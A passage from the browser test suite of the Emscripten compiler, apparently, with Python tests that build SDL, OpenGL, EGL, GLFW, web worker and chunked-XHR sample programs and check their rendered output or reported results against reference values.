    # key events should be detected using SDL_PumpEvents
    create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
    self.btest_exit('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
    """SDL reports the canvas size defined by the custom shell file."""
    self.btest('sdl_canvas_size.c', expected='1',
               args=['-O2', '--minify', '0', '--shell-file',
                     path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
    """glReadPixels works with SDL + OpenGL."""
    # SDL, OpenGL, readPixels
    self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
    self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
    """glMapBuffer emulation under FULL_ES3 renders correctly."""
    self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
               message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
    """SDL + legacy GL emulation renders the screenshot and matches the reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
               args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
    """Same rendering as test_sdl_ogl, but through the Regal GL emulation layer."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
               args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
    """Rendering is correct when the program relies on GL's default matrix mode."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
               args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
    """Immediate-mode rendering using client-side pointers under legacy GL emulation."""
    # Immediate mode with pointers
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
    """GL entry points resolved via proc-address aliases still render correctly."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
               args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
    """Basic GL fog under legacy GL emulation matches the reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
               args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
    """Fog with negative parameters matches the reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
    """Exponential fog density matches the reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
    """GL_EXP2 fog mode matches the reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
    """GL_LINEAR fog mode matches the reference image (1px slack)."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
               args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
    """GLFW under legacy GL emulation, with the default GLFW and with USE_GLFW=2."""
    emulation = ['-s', 'LEGACY_GL_EMULATION']
    libs = ['-lglfw', '-lGL']
    self.btest('glfw.c', '1', args=emulation + libs)
    self.btest('glfw.c', '1', args=emulation + ['-s', 'USE_GLFW=2'] + libs)
def test_glfw_minimal(self):
    """A minimal GLFW program runs under both supported GLFW API versions."""
    for version_flags in ([], ['-s', 'USE_GLFW=2']):
        self.btest('glfw_minimal.c', '1', args=version_flags + ['-lglfw', '-lGL'])
def test_glfw_time(self):
    """glfwGetTime behaves correctly under USE_GLFW=3."""
    self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
    """Helper: build test_egl.c with any extra flags and expect result 1."""
    cmd = [path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL']
    cmd.extend(args)
    self.compile_btest(cmd)
    self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
    """Plain EGL context creation and use."""
    self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
    """EGL works when main() is proxied to a pthread with an offscreen framebuffer."""
    self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
    """Helper: build test_egl_width_height.c with any extra flags and expect result 1."""
    self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
    self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
    """EGL reports the default canvas size."""
    self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
    """EGL canvas size query also works when proxied to a pthread."""
    self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
    """eglCreateContext failure paths report the proper EGL error."""
    self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
    """A program compiled to worker.js runs in a web worker, with and without preloaded file data.

    The driver page is written with a context manager (the original used
    manual open/close), ensuring the handle is released even if write() raises.
    """
    # Test running in a web worker
    create_test_file('file.dat', 'data for worker')
    with open('main.html', 'w') as html_file:
        html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
    for file_data in [1, 0]:
        cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
        print(cmd)
        self.run_process(cmd)
        self.assertExists('worker.js')
        self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
    # code should run standalone too
    self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
    """Synchronous chunked XHR in a web worker: a local server streams random data and the
    worker checksums it; the page forwards the checksum as the test result.

    Fixes the server-readiness wait loop: the original checked `if i == 60` after
    `for i in range(60)`, a condition range(60) can never produce (max is 59), and
    then did `raise e` where `e` is already unbound after the except block on
    Python 3 — so a server that never came up was silently ignored. The loop now
    uses for/else to raise explicitly on timeout. File writes use context managers.
    """
    main = 'chunked_sync_xhr.html'
    worker_filename = "download_and_checksum_worker.js"
    with open(main, 'w') as html_file:
        html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
    c_source_filename = "checksummer.c"
    prejs_filename = "worker_prejs.js"
    with open(prejs_filename, 'w') as prejs_file:
        prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
    # vs. os.path.join(self.get_dir(), filename)
    # vs. path_from_root('tests', 'hello_world_gles.c')
    self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
                        '--pre-js', prejs_filename])
    chunkSize = 1024
    data = os.urandom(10 * chunkSize + 1)  # 10 full chunks and one 1 byte chunk
    checksum = zlib.adler32(data) & 0xffffffff  # Python 2 compatibility: force bigint
    server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
    server.start()
    # block until the server is actually ready
    for _ in range(60):
        try:
            urlopen('http://localhost:11111')
            break
        except Exception:
            print('(sleep for server)')
            time.sleep(1)
    else:
        # never became reachable in 60 attempts
        raise Exception('the local data server did not become ready in time')
    try:
        self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
    finally:
        server.terminate()
    # Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
    # attempt to rmdir() files in use.
    if WINDOWS:
        time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=None):
    """Render the glgears demo and compare against the reference image.

    extra_args: optional extra compiler flags. The default is None rather than
    a mutable [] literal (the classic shared-default-argument pitfall); callers
    that pass a list, as test_glgears_pthreads does, are unaffected.
    """
    self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
               args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + (extra_args or []))
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=None):
    """glgears compiled with pthreads enabled (the program itself uses no threads).

    extra_args is kept for signature compatibility but, as in the original,
    is not forwarded; the default is None instead of a mutable [] literal.
    """
    # test that a program that doesn't use pthreads still works with with pthreads enabled
    # (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
    self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
    """Long-running animated glgears; any frame count in [15, 500) counts as success."""
    for proxy in [0, 1]:
        print('proxy', proxy)
        self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
    """Animated gears via three source variants: plain, FULL_ES2, and the '944' FULL_ES2 variant."""
    es2_suffix = ['', '_full', '_full_944']
    for full_es2 in [0, 1, 2]:
        print(full_es2)
        self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
                            '-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
                            '--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
                           (['-s', 'FULL_ES2=1'] if full_es2 else []))
        self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
    """FULL_ES2 program using SDL proc-address lookup exits with the expected value."""
    self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
    """glgears derivative variant matches the gears reference; the emitted page must not bundle gl-matrix."""
    self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
               args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
               message='You should see animating gears.')
    with open('test.html') as f:
        assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
    """Build the 'OpenGL ES 2.0 Programming Guide' samples and compare each against its reference PNG."""
    self.emcc_args.remove('-Werror')  # the glbook sources are not warning-clean
    programs = self.get_library('glbook', [
        os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
        os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
        os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
        os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
        os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
        os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
        os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
    ], configure=None)

    def book_path(*pathelems):
        # path into the glbook test data tree
        return path_from_root('tests', 'glbook', *pathelems)

    for program in programs:
        print(program)
        basename = os.path.basename(program)
        args = ['-lGL', '-lEGL', '-lX11']
        # two samples need their texture assets preloaded
        if basename == 'CH10_MultiTexture.o':
            shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
            shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
            args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
        elif basename == 'CH13_ParticleSystem.o':
            shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
            args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage

        self.btest(program,
                   reference=book_path(basename.replace('.o', '.png')),
                   args=args)
@requires_graphics_hardware
@parameterized({
    'normal': (['-s', 'FULL_ES2=1'],),
    # Enabling FULL_ES3 also enables ES2 automatically
    'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
    """Build the original (unmodified) glbook samples under FULL_ES2/FULL_ES3 emulation."""
    print(args)
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')

    for source, reference in [
        (os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
        # (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
        (os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
        # (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
        (os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
        (os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
        (os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
    ]:
        print(source)
        self.btest(source,
                   reference=reference,
                   args=['-I' + path_from_root('tests', 'glbook', 'Common'),
                         path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
                         path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
                         '-lGL', '-lEGL', '-lX11',
                         '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
    """Client-side vertex arrays work under FULL_ES3 with GLFW3."""
    self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
    """Browser-side emscripten API calls work; '_third' must be exported for JS to call it."""
    self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
    """emscripten_async_* file loading via a packaged data file, from the cwd and from a subdir.

    The packager's stdout is now captured through a context-managed file; the
    original passed stdout=open('script2.js', 'w') and leaked both handles.
    """
    def setup():
        create_test_file('script1.js', '''
Module._set(456);
''')
        create_test_file('file1.txt', 'first')
        create_test_file('file2.txt', 'second')

    setup()
    with open('script2.js', 'w') as out:
        self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=out)
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])

    # check using file packager to another dir
    self.clear()
    setup()
    ensure_dir('sub')
    with open('script2.js', 'w') as out:
        self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=out)
    shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
    """A main() that never returns still lets async emscripten callbacks fire (expects '7')."""
    self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
    """emscripten FS API loads a file that is preloaded after the program starts running."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')  # preloaded *after* run
    self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
    """FS API behaves identically with assertions disabled and enabled."""
    self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
    self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
    """emscripten_set_main_loop, plain and with main() proxied to a pthread."""
    variants = [
        [],
        ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME'],
    ]
    for variant in variants:
        self.btest('emscripten_main_loop.cpp', '0', args=variant)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
    """Main loop driven by setTimeout works, including under pthreads without AUTO_JS_LIBRARIES."""
    for args in [
        [],
        # test pthreads + AUTO_JS_LIBRARIES mode as well
        ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
    ]:
        self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
    """Main loop combined with run-dependency blockers works, plain and proxied to a pthread."""
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
        self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
    """Main loop driven by setImmediate works, also in a worker and under pthreads."""
    for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
        self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
    """The filesystem remains usable after main() returns, with and without -O1."""
    for args in [[], ['-O1']]:
        self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
    """SDL_Quit shuts down cleanly."""
    self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
    """SDL window resize events are delivered correctly."""
    # FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
    self.emcc_args.append('-Wno-deprecated-declarations')
    self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
    """glGetShaderInfoLog and related queries return sensible values."""
    self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
    """glGetAttachedShaders reports the shaders attached to a program."""
    self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
    """glGetFramebufferAttachmentParameteriv returns correct attachment info."""
    self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
    """SDL + GL shader rendering matches the reference, under -O2 with closure."""
    self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
    """Second shader test; also exercised through the proxy-to-worker path."""
    self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
    """glTexImage2D uploads behave correctly."""
    self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
    """Texture operations work, including proxied to a pthread with an offscreen framebuffer."""
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
        self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
    """Client-side pointers plus a shader render the preloaded screenshot correctly."""
    # pointers and a shader
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
    """Packed vertex data that must be strided by the emulation layer renders correctly."""
    # packed data that needs to be strided
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
    """Strided client-side vertex data renders correctly under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
    """Same pointer/shader rendering, additionally run through the proxy-to-worker path."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
    """Multiple renderer code paths match the reference (GL_UNSAFE_OPTS disabled)."""
    self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
    """Vertex attribute strides are honored (GL_UNSAFE_OPTS disabled)."""
    self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
    """Vertex buffers populated before the context setup render correctly."""
    self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
    """Standard vertex buffer rendering matches the reference (1px slack)."""
    self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
    """Uniform arrays work under GLES2 (with GL_ASSERTIONS), also via proxy-to-worker."""
    self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
    """A small GLES2 conformance suite passes with GL_ASSERTIONS enabled."""
    self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
    """Identity matrix handling in legacy GL emulation; any of the listed hash values passes."""
    self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
    """cubegeom_pre renders under legacy GL emulation and matches the reference image."""
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
    """cubegeom_pre via the Regal GL emulation layer."""
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
    """cubegeom_pre also works in a RELOCATABLE build."""
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
    """cubegeom_pre2 with GL_DEBUG enabled (some coverage that GL_DEBUG does not break the build)."""
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
    """cubegeom_pre3 shares the pre2 reference image."""
